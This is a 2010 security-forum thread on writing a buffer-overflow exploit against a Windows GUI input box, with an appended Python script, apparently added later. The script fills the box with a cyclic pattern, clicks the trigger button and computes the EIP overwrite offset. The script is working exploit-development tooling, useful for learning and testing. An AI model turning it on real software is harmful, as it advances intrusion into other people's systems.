
Security Forums


question on exploit writing.

jake2891
Just Arrived
Joined: 20 Mar 2010
Posts: 0

Posted: Sat Mar 20, 2010 7:11 pm    Post subject: question on exploit writing.

I just want to know: if there is an input box in a Windows application (or any application) that has a buffer overflow vulnerability, but the function that needs to be called to exploit this is not accessible by passing commands to it via a command line like so, "echo aaa | buffer.exe", how would someone get this function to execute with their input in a script like Python? Would I have to open the application and then call that specific function? If so, how could that be done if the function was called foofunction? Any programming language example would be great, or a link to a tutorial if anyone knows of one.

thanks
Fire Ant
Trusted SF Member
Joined: 27 Jun 2008
Posts: 3
Location: London

Posted: Sat Mar 20, 2010 9:31 pm

Assuming a Windows GUI application that has the following:

1 - Text box for input data
2 - "Execute" function which handles text box data in a non-secure manner e.g. Buffer Overflow

You could use the Windows APIs to send the appropriate string to the text box. To do this you need to know several things:

1 - The Windows Handle of the text box object
2 - Use the SendMessage/PostMessage API to write the text in the box
3 - Execute the function e.g. Send mouse click to "Execute" button

voila!

Now, you will need a suitable data set to test with, so I suggest using a fuzzer. Have a look at www.peachfuzzer.com; you can fuzz Windows apps with this, and you should be able to script lots of stuff.

This is of course all relying on a truly exploitable app. I suggest writing your own to test it.

Matt_s
jake2891
Just Arrived
Joined: 20 Mar 2010
Posts: 0

Posted: Tue Mar 23, 2010 10:54 pm

I've been trying to implement the steps you suggested; this is what I have got so far. I'm using SetDlgItemTextA to set the text but having difficulty using Python to set the text. I loaded up the executable in IDA Pro but am not too sure how to use the window handle of the textbox. Here is my code so far. The code opens up the process and tries to write to the input box. Any input, guys? Thanks.

python example.py PID

Code:

import sys
from ctypes import windll   # Windows-only: windll does not exist on other platforms

PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
kernel32 = windll.kernel32
pid = sys.argv[1]

# Open the target process by the PID given on the command line
h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))

if not h_process:
    print("[*] Couldn't acquire a handle to PID: %s" % pid)
    sys.exit(1)

user32 = windll.user32

# SetDlgItemTextA(hDlg, nIDDlgItem, lpString): the first argument is the handle
# of the parent dialog window, the second is the child control's ID.
# The 'A' (ANSI) variant wants a byte string.
# This is the line I'm stuck on:
hwnd_dialog = None   # hwnd handle of textbox - not sure how to get this
user32.SetDlgItemTextA(hwnd_dialog, 1, b"test")

kernel32.CloseHandle(h_process)

jake2891
Just Arrived
Joined: 20 Mar 2010
Posts: 0

Posted: Wed Mar 24, 2010 8:44 am

OK, I've managed to get the window handle, but for some reason it's still not setting my text into the input box. I've asked on Python forums but no one seems to have an answer. Code below.

Code:


import sys
from ctypes import windll   # Windows-only: windll does not exist on other platforms

PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
kernel32 = windll.kernel32
pid = sys.argv[1]

# Open the target process by the PID given on the command line
h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))

if not h_process:
    print("[*] Couldn't acquire a handle to PID: %s" % pid)
    sys.exit(1)

user32 = windll.user32

# parent window
# FindWindowA(lpClassName, lpWindowName): the first argument is the window
# CLASS name, the second the window title; pass None to ignore either one.
# The 'A' (ANSI) variant wants byte strings.
window_handle = user32.FindWindowA(b"WindowsApp", None)

if not window_handle:
    print("[*] can't find window")
    sys.exit(1)

# 1 is the control id of the child window (the edit box inside the parent)
user32.SetDlgItemTextA(window_handle, 1, b"bla")

kernel32.CloseHandle(h_process)

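As an added example (not code from the thread or from either poster), here is a Python script that carries out the three steps Fire Ant lists: find the top-level window, find the Edit and Button child controls with FindWindowExW, load the input box with WM_SETTEXT and read it back with WM_GETTEXT to confirm the text actually took, then press the button with BM_CLICK. The window title "Vulnerable App", the button caption "Execute" and all function names are assumptions, not anything from the thread; read the real class names, captions and control IDs off the target with Spy++ and change the constants. Two details worth checking against the code posted above: FindWindowA/W takes the window class name as its first argument and the title as its second, and SetDlgItemText wants the parent dialog's handle plus the control ID rather than the textbox's own handle. The pattern helpers supply the test data the reply mentions: a cyclic pattern whose 4-byte windows are all distinct, so the value that lands in EIP after the crash maps straight back to an offset in the input.

```python
"""Drive a Windows GUI input box from Python (added example, not the thread's code).

Assumed target, none of it from the thread: a top-level window titled
"Vulnerable App" with a child "Edit" control for input and a child "Button"
captioned "Execute". Read the real class names and captions off the target
with Spy++ and change the constants below.
"""
import string
import sys

# Window-message constants (winuser.h)
WM_SETTEXT = 0x000C
WM_GETTEXT = 0x000D
WM_GETTEXTLENGTH = 0x000E
BM_CLICK = 0x00F5

TARGET_TITLE = "Vulnerable App"   # assumption, not from the thread
BUTTON_CAPTION = "Execute"        # assumption, not from the thread


def cyclic_pattern(length):
    """Metasploit-style 'Aa0Aa1Aa2...' pattern: every 4-byte window is
    distinct across the full 20280-byte sequence, so the value found in EIP
    after a crash identifies the offset directly."""
    units = (u + l + d for u in string.ascii_uppercase
             for l in string.ascii_lowercase for d in string.digits)
    out = ""
    for unit in units:
        if len(out) >= length:
            break
        out += unit
    return out[:length]


def pattern_offset(pattern, eip_value):
    """Offset of the 4 pattern bytes a crash reported in EIP (register value
    as read from the debugger, little-endian), or -1 if not in the pattern."""
    needle = eip_value.to_bytes(4, "little").decode("ascii", "replace")
    return pattern.find(needle)


def _user32():
    """user32 with pointer-sized handle types; only available on Windows."""
    if sys.platform != "win32":
        raise RuntimeError("driving a window needs Windows (ctypes.windll)")
    import ctypes
    from ctypes import wintypes
    u = ctypes.windll.user32
    u.FindWindowW.restype = wintypes.HWND
    u.FindWindowW.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR]
    u.FindWindowExW.restype = wintypes.HWND
    u.FindWindowExW.argtypes = [wintypes.HWND, wintypes.HWND,
                                wintypes.LPCWSTR, wintypes.LPCWSTR]
    u.SendMessageW.restype = wintypes.LPARAM
    u.SendMessageW.argtypes = [wintypes.HWND, wintypes.UINT,
                               wintypes.WPARAM, wintypes.LPARAM]
    return u


def find_controls(title, button_caption):
    """FindWindowW(lpClassName, lpWindowName): the FIRST argument is the
    window class, so pass None there to match on the title. Children are
    then located by class name ("Edit", "Button") with FindWindowExW."""
    u = _user32()
    parent = u.FindWindowW(None, title)
    if not parent:
        raise RuntimeError("no top-level window titled %r" % title)
    edit = u.FindWindowExW(parent, None, "Edit", None)
    button = u.FindWindowExW(parent, None, "Button", button_caption)
    if not edit or not button:
        raise RuntimeError("Edit/Button child not found; check with Spy++")
    return u, edit, button


def set_text_checked(u, hwnd_edit, text):
    """Set the box with WM_SETTEXT and read it back with WM_GETTEXT, so a
    wrong handle or the control's text limit shows up before the click."""
    import ctypes
    buf_in = ctypes.create_unicode_buffer(text)
    u.SendMessageW(hwnd_edit, WM_SETTEXT, 0, ctypes.addressof(buf_in))
    n = u.SendMessageW(hwnd_edit, WM_GETTEXTLENGTH, 0, 0)
    buf_out = ctypes.create_unicode_buffer(n + 1)
    u.SendMessageW(hwnd_edit, WM_GETTEXT, n + 1, ctypes.addressof(buf_out))
    if buf_out.value != text:
        raise RuntimeError("control holds %d chars, sent %d" % (n, len(text)))


def trigger(pattern_length=2000):
    """Full chain: locate controls, load the pattern, press the button."""
    u, edit, button = find_controls(TARGET_TITLE, BUTTON_CAPTION)
    payload = cyclic_pattern(pattern_length)
    set_text_checked(u, edit, payload)
    u.SendMessageW(button, BM_CLICK, 0, 0)   # same as the user clicking it
    return payload


if __name__ == "__main__":
    if len(sys.argv) > 2 and sys.argv[1] == "offset":
        # after the crash: python drive.py offset 0x61413361  -> prints 10
        print(pattern_offset(cyclic_pattern(20280), int(sys.argv[2], 16)))
    else:
        trigger()
```

Run it once with the target open to load the box and press the button; when the debugger reports the faulting EIP, run it again with `offset <hex value>` to get the byte offset of the overwrite. The read-back in set_text_checked is the check jake's posts were missing: if the text never arrives in the control, the failure is reported at the call site instead of being discovered when the button does nothing.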
All times are GMT + 2 Hours